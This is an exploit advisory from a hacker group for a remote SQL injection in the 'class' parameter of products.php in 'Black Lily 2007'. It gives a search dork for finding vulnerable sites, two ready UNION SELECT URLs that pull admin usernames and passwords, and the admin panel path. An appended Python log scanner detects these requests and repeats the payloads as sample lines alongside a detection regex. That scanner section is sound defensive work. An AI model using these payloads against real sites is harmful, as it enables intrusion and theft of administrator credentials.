
Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability






#######################SnIper-sa.com################################
#                                                                  #
#  SSSSS      nnn        nn   ii  ppppppp  eeeeeeeee   rrrrr       #
# ss          nn nn      nn   ii  pp    p  ee          rr   rr     #
#s            nn  nn     nn   ii  pp    p  ee          rr     r    #
# ss          nn   nn    nn   ii  ppppppp  ee          rr   rr     #
#   sssss     nn    nn   nn   ii  pp       eeeeee      rrrr        #
#        ss   nn     nn  nn   ii  pp       ee          rrrr        #
#          s  nn      nn nn   ii  pp       ee          rr  rr      #
#        ss   nn        nnn   ii  pp       ee          rr   rr     #
#   sssss     nn        nnn   ii  pp       eeeeeeeeee  rr     rr   #
#                                                                  #
#####################VerY-SecReT####################################
####################################

 found by :
               VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

 Dork :  "Powered By The Black Lily 2007"
####################################

EXPLOIT:
http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

 or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

########################################

Admin Panel is in http://victim.com/xx/admin/

#####################################

 S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : SecReT@SecuRitY.Com.Sa
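
A log check a site operator could run for the requests shown above, as an added example that is not part of the original advisory. It assumes a legitimate `class` value is a digits-only category id and that the web server writes common-format access logs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2008:09:14:02 +0000] "GET /en/products.php?class=4 HTTP/1.1" 200 5321',
    '203.0.113.20 - - [12/Mar/2008:09:15:40 +0000] "GET /ar/products.php?class=-1%20union%20select'
    '%201,2,password,4,username%20from%20admin/* HTTP/1.1" 200 911',
    '203.0.113.20 - - [12/Mar/2008:09:15:58 +0000] "GET /en/products.php?class=-1+UNION+SELECT'
    '+1,2,3,password,username+from+admin/* HTTP/1.1" 200 907',
    '198.51.100.9 - - [12/Mar/2008:09:20:11 +0000] "GET /en/products.php?class=abc HTTP/1.1" 200 640',
    '198.51.100.7 - - [12/Mar/2008:09:21:30 +0000] "GET /en/index.php?class=-1 HTTP/1.1" 200 4410',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r'union\s+(?:all\s+)?select', re.IGNORECASE)

def find_class_injection(lines):
    """Return (client_ip, path, decoded_value, reason) for suspect products.php requests."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith('/products.php'):
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get('class', []):
            # Assumption: a legitimate class id is digits only. Anything else is
            # flagged, so encodings the keyword regex misses are still caught.
            if re.fullmatch(r'[0-9]+', value):
                continue
            reason = 'union-select' if UNION_RE.search(value) else 'non-numeric'
            hits.append((line.split()[0], url.path, value, reason))
    return hits

if __name__ == '__main__':
    for hit in find_class_injection(SAMPLE_LOG):
        print(*hit, sep=' | ')
```

The same digits-only rule, enforced in the application before the query is built (an integer cast or a bound parameter), closes the hole that the log check only observes.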

